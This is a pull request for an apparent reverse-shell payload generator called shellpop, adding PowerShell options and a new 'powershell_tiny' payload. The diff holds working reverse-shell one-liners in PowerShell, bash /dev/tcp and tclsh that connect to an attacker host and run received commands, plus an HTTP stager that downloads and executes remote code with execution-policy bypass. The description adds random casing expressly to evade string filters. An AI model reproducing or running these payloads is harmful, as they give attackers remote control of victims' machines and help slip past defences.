### PR TITLE
New PowerShell features

### DIFF
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -1,0 +1,2 @@
+1. Powershell payloads generated with --xor and --base64 alongside with --powershell-random-case will not work.
+1.1 Powershell payloads generated with --xor and --base64 still work. You just cant use --random-case in the case of --xor.

--- a/bin/shellpop
+++ b/bin/shellpop
@@ -395,7 +395,7 @@ AVAILABLE_SHELLS = [
                 use_http_stager=list(filter(lambda x: x[0] not in [1,3], WINDOWS_STAGERS )) ),
 
             22: Shell("Windows Powershell Shellcode-Injection a.k.a BloodSeeker TCP - x64",
-                "shellcode_injection_aka_bloodseeker",
+                "powershell_shellcode_injection",
                 "reverse",
                 "tcp",
                 REVERSE_WINDOWS_BLOODSEEKER_TCP(),
@@ -403,6 +403,16 @@ AVAILABLE_SHELLS = [
                 arch="x64",
                 use_handler=None,
                 use_http_stager=[(1, Powershell_HTTP_Stager),]), # This will only work with powershell.
+            
+            23: Shell("Windows Powershell Tiny TCP",
+                "powershell_tiny",
+                "reverse",
+                "tcp",
+                REVERSE_POWERSHELL_TINY_TCP(),
+                system="windows",
+                arch="x86 / x64",
+                use_handler=reverse_tcp_handler,
+                use_http_stager=WINDOWS_STAGERS),
         }
     ]
 
@@ -514,7 +524,6 @@ def main():
     parser.add_argument("--number", type=int, help="Shell code index number", required=False)
     parser.add_argument("--shell", type=str, default="", help="Terminal shell to be used when decoding some encoding scheme.", required=False)
 
-
     # Shell Type
     payload_arg = parser.add_argument_group('Shell Types')
     payload_arg.add_argument("--reverse", action="store_true", help="Victim communicates back to the attacking machine.")
@@ -538,6 +547,12 @@ def main():
     stagingarg.add_argument("--stager", type=str, help="Use staging for shells", required=False)
     # Http-staging options
     stagingarg.add_argument("--http-port", type=int, help="HTTP staging port to be used", required=False)
+
+    # Powershell features
+    powershell_arg = parser.add_argument_group("PowerShell options")
+    powershell_arg.add_argument("--powershell-x86", action="store_true", help="Use powershell 32-bit executable.")
+    powershell_arg.add_argument("--powershell-x64", action="store_true", help="Use powershell 64-bit executable.")
+    powershell_arg.add_argument("--powershell-random-case", action="store_true", help="Use random-case in powershell payloads.")
 
     #Miscellaneous 
     miscarg = parser.add_argument_group("Miscellaneous")

--- a/src/reverse.py
+++ b/src/reverse.py
@@ -27,7 +27,7 @@ def BASH_TCP():
 	return """/bin/bash -i >& /dev/tcp/TARGET/PORT 0>&1"""
 
 def REV_POWERSHELL_TCP():
-	return """powershell -nop -ep bypass -Command '$ip=\\"TARGET\\";$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\" + $env:username + \\" on \\" + $env:computername + \\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$stream.Write($sendbytes,0,$sendbytes.Length);$sendbytes = ([text.encoding]::ASCII).GetBytes(\\"PS \\" + (Get-Location).Path + \\"> \\");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -command $returndata 2>&1 | Out-String ) } catch { Write-Warning \\"Something went wrong with execution of command on the target.\\"; Write-Error $_; }; $sendback = $result +  \\"PS \\" + (Get-Location).Path + \\"> \\"; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };'"""
+	return """powershell.exe -nop -ep bypass -Command "$ip='TARGET';$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ');$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -c $returndata 2>&1 | Out-String ) } catch { Write-Warning 'Something went wrong with execution of command on the target.'; Write-Error $_; }; $sendback = $result +  'PS ' + (Get-Location).Path + '> '; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };" """
 
 def REVERSE_TCLSH():
 	return """echo 'set s [socket TARGET PORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh"""
@@ -68,3 +68,6 @@ def REVERSE_WINDOWS_NCAT_TCP():
 
 def REVERSE_WINDOWS_BLOODSEEKER_TCP():
 	return """ Custom Shell requires a Custom code. """
+
+def REVERSE_POWERSHELL_TINY_TCP():
+	return """powershell.exe -nop -ep bypass -Command "$c=new-object system.net.sockets.tcpclient('TARGET',PORT);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'PS' + (pwd).Path + '>';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()" """

--- a/src/stagers.py
+++ b/src/stagers.py
@@ -94,7 +94,7 @@ class Powershell_HTTP_Stager(HTTPStager):
         self.args = args    
         self.host = conn_info[0]
         self.port = conn_info[1]
-        self.payload = """powershell.exe -w hidden -nop -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $x.downloadString(\\"http://{0}:{1}/{2}\\") """.format(self.host,
+        self.payload = """powershell.exe -nop -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $x.downloadString('http://{0}:{1}/{2}') """.format(self.host,
                 self.port, filename)
 
 class Certutil_HTTP_Stager(HTTPStager):


### PR DESCRIPTION
New features in this branch:
+ Added a new Powershell TCP shell, smaller than the other one. It is named powershell_tiny.
+ Added --powershell-x86 flag to generate a payload that enforces using powershell 32-bit executable.
+ Added --powershell-x64 flag to generate a payload that enforces using powershell 64-bit executable.
+ Added --powershell-random-case flag to generate randomly cased powershell payloads. This will bypass string filters.
+ Added a powershell_wrapper function to handle the above features.

Modifications in this branch:
+ Refactored the way powershell encoding is done.
+ Refactored the way quotes are dealt with powershell payloads. This ensures all payloads will work in cmd.exe. Most of them will **NOT** work when invoked from powershell.exe

Tests done:
+ Tested windows/reverse/tcp/powershell
+ Tested windows/reverse/tcp/powershell_tiny
+ Tested windows/reverse/tcp/powershell_shellcode_injection
+ Tested linux payloads to see if any changes interferred. Apparently it is working fine.

The flags --base64 and --xor were tested individually and combined. Everything seems to work.

If anyone finds a bug, please report.